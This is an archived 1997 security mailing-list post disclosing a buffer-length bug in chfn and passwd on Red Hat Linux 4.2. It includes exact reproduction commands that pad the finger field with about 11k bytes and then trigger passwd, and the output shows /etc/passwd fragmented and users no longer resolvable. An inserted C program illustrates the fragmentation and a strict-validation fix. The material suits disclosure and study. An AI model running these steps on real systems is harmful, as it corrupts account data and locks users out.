Buffer Overrun / DOS in /bin/passwd (at least Redhat Linux 4.2)

From: Alex Mottram (alex@NET-CONNECT.NET)
Date: Fri Dec 19 1997 - 05:37:49 PST

    I don't have the time to look into this much further, but it definitely
    looks scary.  I've tried it on 3 machines, and they all produce the
    same results.  For what it's worth, all 3 machines were installed from
    the Redhat PowerTools 4.2 CD and have applied all relevant patches
    from ftp.redhat.com/pub/updates/4.2/i386/.
    
    Configuration Information
    ---------------------------------------------
    [alex@machine alex]$ cat /etc/redhat-release
    release 4.2 (Biltmore)
    
    rpm -qf /usr/bin/chfn
    util-linux-2.5-38
    
    rpm -qf /usr/bin/passwd
    passwd-0.50-7
    
    rpm -q pam
    pam-0.57-4
    
    [alex@machine alex]$ cat /etc/pam.conf
    #
    #  THIS FILE IS NOW OBSOLETE
    #
    #  The contents of this file should be replaced by files in the
    #  /etc/pam.d/ directory.
    #
    #
    
    [alex@machine alex]$ ls /etc/pam.d/
    chfn    ftp     login   passwd  rlogin  samba   xdm
    chsh    imap    other   rexec   rsh     su
    
    [alex@machine alex]$ cat /etc/pam.d/chfn
    #%PAM-1.0
    auth       required     /lib/security/pam_pwdb.so shadow nullok
    account    required     /lib/security/pam_pwdb.so
    password   required     /lib/security/pam_cracklib.so
    password   required     /lib/security/pam_pwdb.so shadow nullok use_authtok
    session    required     /lib/security/pam_pwdb.so
    
    [alex@machine alex]$ cat /etc/pam.d/passwd
    #%PAM-1.0
    auth       required     /lib/security/pam_pwdb.so shadow nullok
    account    required     /lib/security/pam_pwdb.so
    password   required     /lib/security/pam_cracklib.so
    password   required     /lib/security/pam_pwdb.so use_authtok nullok
    
    [alex@machine /tmp]$ tail /etc/passwd
    alex:x:500:500:alex,,,,:/home/alex:/bin/bash
    zane:x:501:501:zane,,,,:/home/zane:/bin/bash
    someone:x:502:502::/home/someone:/bin/bash
    
    [alex@machine /tmp]$ cat pass
    #this test has 11719 bytes of the sequence "0123456789", Xs work just as well.
    export -p BUFF='[many Xs, 10k is more than plenty, 2k should work]'
    /bin/bash
    
    [alex@machine /tmp]$ ./pass
    [alex@machine /tmp]$ chfn -f $BUFF -p $BUFF -h $BUFF -o $BUFF
    Changing finger information for alex.
    Password:
    Finger information changed.
    [alex@machine /tmp]$ wc /etc/passwd
         26      29    2068 /etc/passwd
    
    ** At this point, the passwd entry for 'alex' is >48k long **
    
    [alex@machine alex]$ passwd
    Changing password for alex
    (current) UNIX password:
    New UNIX password:
    Segmentation fault
    
    ** LOGIN AS SECOND USER **
    [zane@machine zane]$ passwd
    Changing password for zane
    (current) UNIX password:
    New UNIX password:
    Retype new UNIX password:
    passwd: all authentication tokens updated successfully
    
    ** 'passwd' just snipped our one big line into nice 8k chunks
    ** and created some junk passwd file entries.
    
    [zane@machine zane]$ wc /etc/passwd
         31      34   47829 /etc/passwd
    
    [zane@machine zane]$ su someuser
    su: user someuser does not exist
    [zane@machine zane]$ su alex
    su: user alex does not exist
    [zane@machine zane]$ su zane
    su: user zane does not exist
    
    Other services I checked were equally screwed.  (ftp, pop-3, etc...)
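The corruption the report describes (one over-long /etc/passwd line silently turned into several 8k "entries" by a later passwd run) comes from reading records into a fixed-size buffer and treating every read as a complete record. The following C program is an added illustration and is not code from the post or from the passwd package: it builds a constructed passwd file in memory with one entry padded the way chfn padded it, shows how a naive fixed-buffer reader fragments that entry into malformed records, and contrasts it with a strict reader that locates the line end first and rejects any line that is over-long or does not have seven fields. The 8192-byte buffer (inferred from "8k chunks") and the 20000-byte GECOS padding are assumptions, as is everything else in the program.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumptions (not from the report): the splitting "into 8k chunks" is
 * modelled as an 8192-byte fgets()-style buffer, and the padded GECOS
 * field is 20000 bytes so that the entry spans three such chunks. */
#define GECOS_LEN 20000
#define CHUNK_BUF 8192
#define PASSWD_FIELDS 7

/* Constructed sample /etc/passwd contents: two ordinary entries around one
 * whose GECOS field has been padded the way chfn did in the report. */
static char *build_sample(void)
{
    const char *before = "root:x:0:0:root:/root:/bin/bash\n";
    const char *head   = "alex:x:500:500:";
    const char *tail   = ":/home/alex:/bin/bash\n";
    const char *after  = "zane:x:501:501:zane,,,,:/home/zane:/bin/bash\n";
    size_t len = strlen(before) + strlen(head) + GECOS_LEN + strlen(tail) + strlen(after);
    char *buf = malloc(len + 1);
    char *p = buf;

    if (buf == NULL)
        return NULL;
    memcpy(p, before, strlen(before)); p += strlen(before);
    memcpy(p, head, strlen(head));     p += strlen(head);
    memset(p, 'X', GECOS_LEN);         p += GECOS_LEN;
    memcpy(p, tail, strlen(tail));     p += strlen(tail);
    memcpy(p, after, strlen(after));   p += strlen(after);
    *p = '\0';
    return buf;
}

/* Number of colon-separated fields up to the end of the line. */
static int count_fields(const char *line)
{
    int fields = 1;

    for (; *line != '\0' && *line != '\n'; line++)
        if (*line == ':')
            fields++;
    return fields;
}

/* fgets()-style read from an in-memory string: at most n-1 bytes, stops
 * after a newline, returns 0 at end of input. */
static int mem_fgets(char *dst, size_t n, const char *src, size_t *pos)
{
    size_t i = 0;

    if (src[*pos] == '\0')
        return 0;
    while (i + 1 < n && src[*pos] != '\0') {
        char c = src[(*pos)++];
        dst[i++] = c;
        if (c == '\n')
            break;
    }
    dst[i] = '\0';
    return 1;
}

/* Naive rewriter: every buffer-sized read is treated as a complete record,
 * so a line longer than the buffer silently becomes several "entries".
 * Returns the record count; *malformed receives how many of them lack
 * the seven passwd fields (the "junk entries" of the report). */
static int naive_record_count(const char *data, int *malformed)
{
    char line[CHUNK_BUF];
    size_t pos = 0;
    int records = 0;

    *malformed = 0;
    while (mem_fgets(line, sizeof line, data, &pos)) {
        records++;
        if (count_fields(line) != PASSWD_FIELDS)
            (*malformed)++;
    }
    return records;
}

/* Strict reader: locates the newline first, refuses any line longer than
 * max_line or with the wrong field count, and never splits a record.
 * Returns the accepted count; *rejected receives the number refused. */
static int strict_record_count(const char *data, size_t max_line, int *rejected)
{
    const char *p = data;
    int accepted = 0;

    *rejected = 0;
    while (*p != '\0') {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);

        if (len > max_line || count_fields(p) != PASSWD_FIELDS)
            (*rejected)++;
        else
            accepted++;
        p = nl ? nl + 1 : p + len;
    }
    return accepted;
}

int main(void)
{
    char *data = build_sample();
    int malformed = 0, rejected = 0, naive, strict;

    if (data == NULL)
        return 1;
    naive = naive_record_count(data, &malformed);
    strict = strict_record_count(data, CHUNK_BUF - 1, &rejected);
    printf("naive: %d records, %d malformed\n", naive, malformed);  /* 5, 3 */
    printf("strict: %d accepted, %d rejected\n", strict, rejected); /* 2, 1 */
    free(data);
    return 0;
}
```

The naive reader turns three entries into five, three of which no longer have seven fields, which is exactly why su stopped resolving the users in the report. The strict reader keeps the two well-formed entries and reports the padded one as an error instead of rewriting the file around it; a real rewriter should abort and leave /etc/passwd untouched when any line is rejected.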
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:37:00 PDT